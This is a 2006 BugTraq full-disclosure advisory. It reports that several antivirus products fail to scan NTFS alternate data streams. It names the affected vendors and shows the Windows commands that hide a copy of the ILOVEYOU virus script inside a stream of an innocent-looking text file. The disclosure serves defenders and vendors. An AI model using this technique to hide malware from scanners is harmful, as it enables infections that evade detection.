BugTraq
Multiple Vendor NTFS Data Stream Malware Stealth Technique Jun 04 2006 06:17PM
Joxean Koret (joxeankoret yahoo es)
Hi to all!

Because it isn't a new problem and is well known by virus and spyware
writters I decide to release to the public now. Full disclosure.

Attached goes a simple paper that describes this "very-advanced"
technique that was applicable at 1993 and is currently applicable.

Regards,
Joxean Koret

Disclaimer
----------

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.

------------------------------------------------------------------------
---

Contact
-------

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

Multiple Vendor NTFS Data Stream Malware Stealth Technique

----------------------------------------------------------

Affected product/vendors:

Panda Software. All products.

ClamWin. All versions.

Norman Virus Control. All versions.

AVG Antivirus.

Non-affected vendors:

Mcaffe / Computer Associates

Avira Antivir PersonalEdition Classic

Technique Description

----------------------

It isn't in any way a new technique, the first proof of concept of hidding malware into an NTFS

data stream was published at 2000. Apparently the technique wasn't so popular and due to this fact

the 75% (or more) of the anti-virus industry have been ignore it.

The technique is as simple as follow. Download a virus file, even an old one. Call it, in example,

'iloveyou.vbs'. Next, go to a command prompt:

------------------------------------------------------------------------
------------------------------

C:\>echo I'm an inocent file. > file.txt

C:\>type file.txt

I'm an inocent file.

C:\>dir

Volume in drive C has no label.

Volume Serial Number is 8475-DDEF

Directory of C:

06/03/2006 01:10 <DIR> Documents and Settings

03/06/2006 05:10 23 file.txt

03/06/2006 04:52 10.320 iloveyou.txt

03/06/2006 04:52 10.320 iloveyou.vbs

26/12/2005 00:51 <DIR> Inetpub

03/06/2006 05:09 <DIR> Program Files

29/05/2006 23:24 12 test1.vbs

03/06/2006 05:06 <DIR> WINNT

4 File(s) 20.675 bytes

4 Dir(s) 2.539.368.448 bytes free

C:\>type iloveyou.vbs > file.txt:virus.vbs

C:\>type file.txt

I'm an inocent file.

C:\>more < file.txt:virus.vbs

rem barok -loveletter(vbe) <i hate go to school>

rem by: spyder / ispyder (at) mail (dot) com [email concealed] / @GRAMMERSoft Group /

(...)

---More---

------------------------------------------------------------------------
------------------------------

Now, try scanning your system with your preferred vulnerable antivirus product. The first file in a

normal data stream 'iloveyou.vbs' will (surely) be detected but not the copy of it stored in an alternate

data stream of the apparently innocent file c:\file.txt.

Disclaimer

----------

The information in this advisory and any of its

demonstrations is provided "as is" without any

warranty of any kind.

I am not liable for any direct or indirect damages

caused as a result of using the information or

demonstrations provided in any part of this advisory.

------------------------------------------------------------------------
---

Contact

-------

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQBEgyO5U6rFMEYDrlERAi/4AKCZk80nNIsHe01T3iB8Ijn6W4fgdgCePOvq
GQBRy5i4HvlYG9yqnKR83IM=
=5f9T
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus